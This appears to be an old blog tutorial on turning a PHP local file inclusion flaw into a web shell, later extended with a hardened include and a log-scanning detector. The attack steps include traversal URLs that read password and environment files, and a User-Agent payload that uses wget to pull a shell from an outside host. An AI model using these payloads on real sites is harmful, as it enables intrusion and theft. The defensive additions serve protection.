Tuesday, January 8, 2013

Hacking Websites via LFI (Simple, Short and easy)


 1. Introduction
 2. /proc/self/environ
 3. PHP injection
 4. Accessing the shell

1. Introduction

Remember LFI? This tutorial shows how a Local File Inclusion (LFI) vulnerability on a website is turned into a shell on the web server.

Here is the example of a code that is vulnerable to LFI:

<?php
// LFI Vulnerable Code: the request parameter is passed straight to include()
$redirect = $_GET['redirect'];
include($redirect);
?>

It is vulnerable because $redirect is not sanitized, therefore include($redirect); will include whatever file path is supplied in $_GET['redirect'].

Here is an example of LFI on Unix (very old):
http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)
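For comparison, here is a hardened replacement for the vulnerable redirect.php above. This is an added example, not code from the original post: the request parameter only selects a key in a fixed allowlist, so the raw value never reaches include() and the traversal payloads shown above have nothing to act on. The pages/ directory and the file names in the allowlist are assumptions made for the example.

```php
<?php
// Added example (not the post's code): hardened replacement for redirect.php.
// The user-supplied value is used only as a lookup key; the file that is
// actually included always comes from the allowlist below.

declare(strict_types=1);

// Allowlist: request key => file relative to the pages/ directory.
// These file names are assumptions for this example.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map the request parameter to an absolute path under pages/, or null if
 * the key is unknown or the resolved file is not where we expect it.
 */
function resolvePage(?string $requested): ?string
{
    // Default page when the parameter is absent or empty.
    if ($requested === null || $requested === '') {
        $requested = 'home';
    }

    // Unknown keys are rejected; "../" or "/proc/self/environ" is simply
    // not a key in the map, so it never touches the filesystem.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }

    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$requested]);

    // Belt and braces: the resolved file must exist and live under pages/.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// $_GET values may be arrays (?redirect[]=x); only accept a plain string.
$raw  = $_GET['redirect'] ?? null;
$page = resolvePage(is_string($raw) ? $raw : null);

if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

The allowlist is the real fix; the realpath() check is a second line of defence in case the map is later edited to contain a relative or symlinked path.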

2. /proc/self/environ

To check if it is vulnerable, we enter this in the ../ part:
../../../../../proc/self/environ

If the response contains environment variables such as DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc., the file was included and the site is vulnerable.

If you get only a blank page, it isn't vulnerable to this technique.

3. PHP Injection

Now request the same URL again, using Tamper Data to change the User-Agent header to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>

Now, submit the request.

Our command will be executed.

4. Accessing the shell

To check if the command got executed, we request the file it should have written, something like this:
http://www.google.ca/gonullyourself.php

If our shell is there, the command was successfully executed.

Easy :) Isn't it?
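From the defender's side, the technique in sections 2 to 4 leaves two distinct traces in the web server access log: a request whose path or query contains directory traversal or /proc/self/environ, and a User-Agent header that carries a PHP open tag. The following checker, an added example and not part of the original post, parses Apache/nginx "combined" format lines and flags both signals. The log lines, IP addresses and timestamps in it are constructed for the example.

```php
<?php
// Added example (not from the post): flag LFI-to-shell attempts in an
// access log. Two signals are checked per line:
//   1. directory traversal or /proc/self/environ in the request
//   2. a PHP open tag ("<?", "<?php", "<?=") in the User-Agent header
// All log lines below are constructed; the addresses are documentation ranges.

declare(strict_types=1);

// Apache "combined" format (nginx's default "combined" is the same layout):
// host ident user [time] "request" status bytes "referer" "user-agent"
const COMBINED_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';

/** Split one combined-format line into its fields, or null if it does not match. */
function parseLine(string $line): ?array
{
    if (!preg_match(COMBINED_RE, $line, $m)) {
        return null;
    }
    return [
        'ip'      => $m[1],
        'time'    => $m[2],
        'request' => $m[3],
        'status'  => (int) $m[4],
        'agent'   => $m[7],
    ];
}

/** Return a list of indicator descriptions for one parsed entry (empty if clean). */
function lfiIndicators(array $entry): array
{
    $hits = [];

    // Decode once so "..%2F" and "%2e%2e/" are caught along with plain "../".
    $req = strtolower(rawurldecode($entry['request']));
    if (strpos($req, '../') !== false || strpos($req, '..\\') !== false) {
        $hits[] = 'directory traversal in request';
    }
    if (strpos($req, '/proc/self/environ') !== false) {
        $hits[] = '/proc/self/environ requested';
    }

    // A PHP open tag in the User-Agent is never legitimate client behaviour.
    // "<?xml" is excluded so XML-ish agent strings do not trip the check.
    if (preg_match('/<\?(?!xml)/i', $entry['agent'])) {
        $hits[] = 'PHP open tag in User-Agent';
    }
    return $hits;
}

// Constructed sample log: one normal request, then the two steps of the attack.
$sampleLog = [
    '203.0.113.5 - - [08/Jan/2013:10:00:01 +0000] "GET /redirect.php?redirect=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/Jan/2013:10:00:07 +0000] "GET /redirect.php?redirect=../../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/Jan/2013:10:00:12 +0000] "GET /redirect.php?redirect=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048 "-" "<?php echo 1; ?>"',
];

foreach ($sampleLog as $line) {
    $entry = parseLine($line);
    if ($entry === null) {
        fwrite(STDERR, "unparsed line: $line\n");
        continue;
    }
    $hits = lfiIndicators($entry);
    if ($hits) {
        printf("%s %s -> %s\n", $entry['time'], $entry['ip'], implode('; ', $hits));
    }
}
```

Run it with php from the command line; only the second and third sample lines are reported. A 200 status on the /proc/self/environ request is the strongest signal, since it means the include actually returned the file rather than erroring out.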
